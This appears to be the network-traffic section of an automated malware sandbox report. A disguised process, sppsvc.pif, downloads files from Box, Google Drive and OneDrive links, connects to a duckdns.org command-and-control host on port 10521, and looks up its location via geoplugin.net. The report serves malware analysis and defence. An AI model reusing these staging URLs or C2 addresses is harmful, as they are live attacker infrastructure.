Apr 24, 2024 08:40:14.227322102 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.227376938 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.227389097 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.227485895 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.227536917 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.227549076 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.228367090 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.228419065 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.228430033 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.229185104 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.229242086 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.229254007 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.229362011 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.229413033 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.229424953 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.230108023 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.230186939 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.230197906 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.231081009 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.231144905 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.231158018 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.231817007 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.231904030 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.231936932 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.231951952 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.232004881 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.232016087 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.232961893 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.233011007 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.233021975 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.233670950 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.233726978 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.233738899 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.233900070 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.233953953 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.233966112 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.234522104 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.234581947 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.234594107 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.235375881 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.235425949 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.235438108 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.235521078 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.235569954 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.235582113 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.236313105 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.236377954 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.236391068 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.237216949 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.237272024 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.237284899 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.237363100 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.237412930 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.237425089 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.238004923 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.238071918 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.238084078 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.241760969 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.241802931 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.241846085 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.241864920 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.241910934 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.241952896 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.244956970 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.245002031 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.245047092 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.245060921 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.245090961 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.247486115 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.247533083 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.247571945 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.247589111 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.247643948 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.247657061 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.247703075 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.247780085 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.251612902 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.251652956 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.251688004 CEST	49737	443	192.168.2.4	142.250.101.132
Apr 24, 2024 08:40:14.251703024 CEST	443	49737	142.250.101.132	192.168.2.4
Apr 24, 2024 08:40:14.537400007 CEST	49738	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.537494898 CEST	443	49738	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:14.537592888 CEST	49738	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.537714005 CEST	49738	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.537873030 CEST	443	49738	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:14.537956953 CEST	49738	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.560834885 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.560857058 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:14.560960054 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.561187029 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:14.561199903 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.098422050 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.098692894 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:15.100888014 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:15.100914955 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.101213932 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.102416992 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:15.144150972 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.608606100 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.608828068 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.608943939 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:15.609086037 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:15.609147072 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:15.609184027 CEST	49739	443	192.168.2.4	13.107.139.11
Apr 24, 2024 08:40:15.609200001 CEST	443	49739	13.107.139.11	192.168.2.4
Apr 24, 2024 08:40:20.354918957 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:20.786942005 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:20.787112951 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:20.790460110 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:21.356791973 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:21.413957119 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:21.830193996 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:21.833988905 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:22.401591063 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:22.401652098 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:22.934864044 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:23.071573973 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:23.073045969 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:23.559047937 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:23.612025023 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:23.733165026 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:40:24.038568020 CEST	80	49747	178.237.33.50	192.168.2.4
Apr 24, 2024 08:40:24.038654089 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:40:24.038830996 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:40:24.347611904 CEST	80	49747	178.237.33.50	192.168.2.4
Apr 24, 2024 08:40:24.347781897 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:40:24.357618093 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:24.841566086 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:25.347667933 CEST	80	49747	178.237.33.50	192.168.2.4
Apr 24, 2024 08:40:25.347771883 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:40:30.407052040 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:40:30.409876108 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:40:30.996895075 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:41:00.486457109 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:41:00.487735033 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:41:01.048665047 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:41:29.792541027 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:41:30.547511101 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:41:30.548547983 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:41:30.587028980 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:41:31.110332012 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:41:32.088135958 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:41:35.089020967 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:41:41.090250015 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:41:53.179243088 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:42:00.599850893 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:42:00.601279020 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:42:01.163645029 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:42:17.190654993 CEST	49747	80	192.168.2.4	178.237.33.50
Apr 24, 2024 08:42:30.684190035 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:42:30.688724041 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:42:31.252226114 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:43:00.699220896 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:43:00.700687885 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:43:01.259850025 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:43:30.732068062 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:43:30.794116020 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:43:31.988363028 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:43:32.632829905 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:44:00.821619034 CEST	10521	49742	45.74.19.121	192.168.2.4
Apr 24, 2024 08:44:00.822856903 CEST	49742	10521	192.168.2.4	45.74.19.121
Apr 24, 2024 08:44:01.399694920 CEST	10521	49742	45.74.19.121	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 08:40:04.304291010 CEST	55881	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:04.486675978 CEST	53	55881	1.1.1.1	192.168.2.4
Apr 24, 2024 08:40:06.019788027 CEST	63303	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:06.193239927 CEST	53	63303	1.1.1.1	192.168.2.4
Apr 24, 2024 08:40:07.492173910 CEST	50828	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:07.666789055 CEST	53	50828	1.1.1.1	192.168.2.4
Apr 24, 2024 08:40:09.782248020 CEST	54482	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:09.935821056 CEST	53	54482	1.1.1.1	192.168.2.4
Apr 24, 2024 08:40:10.755620956 CEST	65492	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:10.909862995 CEST	53	65492	1.1.1.1	192.168.2.4
Apr 24, 2024 08:40:14.382196903 CEST	61118	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:15.610536098 CEST	53652	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:19.445534945 CEST	55646	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:20.353662014 CEST	53	55646	1.1.1.1	192.168.2.4
Apr 24, 2024 08:40:23.573537111 CEST	59727	53	192.168.2.4	1.1.1.1
Apr 24, 2024 08:40:23.727997065 CEST	53	59727	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 08:40:04.304291010 CEST	192.168.2.4	1.1.1.1	0xa6e3	Standard query (0)	elmauz.box.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:06.019788027 CEST	192.168.2.4	1.1.1.1	0x7541	Standard query (0)	elmauz.app.box.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:07.492173910 CEST	192.168.2.4	1.1.1.1	0xd5f5	Standard query (0)	public.boxcloud.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.782248020 CEST	192.168.2.4	1.1.1.1	0xdd4f	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:10.755620956 CEST	192.168.2.4	1.1.1.1	0x61b7	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:14.382196903 CEST	192.168.2.4	1.1.1.1	0x21d7	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:15.610536098 CEST	192.168.2.4	1.1.1.1	0xc05a	Standard query (0)	sf0kkw.by.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:19.445534945 CEST	192.168.2.4	1.1.1.1	0x695d	Standard query (0)	embargogo237.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:23.573537111 CEST	192.168.2.4	1.1.1.1	0x181e	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 08:40:04.486675978 CEST	1.1.1.1	192.168.2.4	0xa6e3	No error (0)	elmauz.box.com		74.112.186.144	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:06.193239927 CEST	1.1.1.1	192.168.2.4	0x7541	No error (0)	elmauz.app.box.com		74.112.186.144	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:07.666789055 CEST	1.1.1.1	192.168.2.4	0xd5f5	No error (0)	public.boxcloud.com		74.112.186.128	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.935821056 CEST	1.1.1.1	192.168.2.4	0xdd4f	No error (0)	drive.google.com		142.250.101.102	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.935821056 CEST	1.1.1.1	192.168.2.4	0xdd4f	No error (0)	drive.google.com		142.250.101.100	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.935821056 CEST	1.1.1.1	192.168.2.4	0xdd4f	No error (0)	drive.google.com		142.250.101.138	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.935821056 CEST	1.1.1.1	192.168.2.4	0xdd4f	No error (0)	drive.google.com		142.250.101.101	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.935821056 CEST	1.1.1.1	192.168.2.4	0xdd4f	No error (0)	drive.google.com		142.250.101.139	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:09.935821056 CEST	1.1.1.1	192.168.2.4	0xdd4f	No error (0)	drive.google.com		142.250.101.113	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:10.909862995 CEST	1.1.1.1	192.168.2.4	0x61b7	No error (0)	drive.usercontent.google.com		142.250.101.132	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:14.536498070 CEST	1.1.1.1	192.168.2.4	0x21d7	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 08:40:14.536498070 CEST	1.1.1.1	192.168.2.4	0x21d7	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 08:40:14.536498070 CEST	1.1.1.1	192.168.2.4	0x21d7	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 08:40:14.536498070 CEST	1.1.1.1	192.168.2.4	0x21d7	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:14.536498070 CEST	1.1.1.1	192.168.2.4	0x21d7	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:15.823857069 CEST	1.1.1.1	192.168.2.4	0xc05a	No error (0)	sf0kkw.by.files.1drv.com	by-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 08:40:15.823857069 CEST	1.1.1.1	192.168.2.4	0xc05a	No error (0)	by-files.fe.1drv.com	odc-by-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 08:40:20.353662014 CEST	1.1.1.1	192.168.2.4	0x695d	No error (0)	embargogo237.duckdns.org		45.74.19.121	A (IP address)	IN (0x0001)	false
Apr 24, 2024 08:40:23.727997065 CEST	1.1.1.1	192.168.2.4	0x181e	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

elmauz.box.com

elmauz.app.box.com

public.boxcloud.com

drive.google.com

drive.usercontent.google.com

onedrive.live.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49747	178.237.33.50	80	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 08:40:24.038830996 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Apr 24, 2024 08:40:24.347611904 CEST	1173	IN	HTTP/1.1 200 OK date: Wed, 24 Apr 2024 06:40:24 GMT server: Apache content-length: 965 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	74.112.186.144	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:04 UTC	194	OUT	GET /shared/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: elmauz.box.com
2024-04-24 06:40:05 UTC	327	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 24 Apr 2024 06:40:05 GMT Content-Type: text/html; charset=UTF-8 Location: /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv Strict-Transport-Security: max-age=31536000 Via: 1.1 google Content-Length: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	74.112.186.144	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:05 UTC	194	OUT	GET /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: elmauz.box.com
2024-04-24 06:40:06 UTC	353	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 24 Apr 2024 06:40:05 GMT Content-Type: text/html; charset=UTF-8 Location: https://elmauz.app.box.com/public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv Strict-Transport-Security: max-age=31536000 Via: 1.1 google Content-Length: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	74.112.186.144	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:06 UTC	198	OUT	GET /public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: elmauz.app.box.com
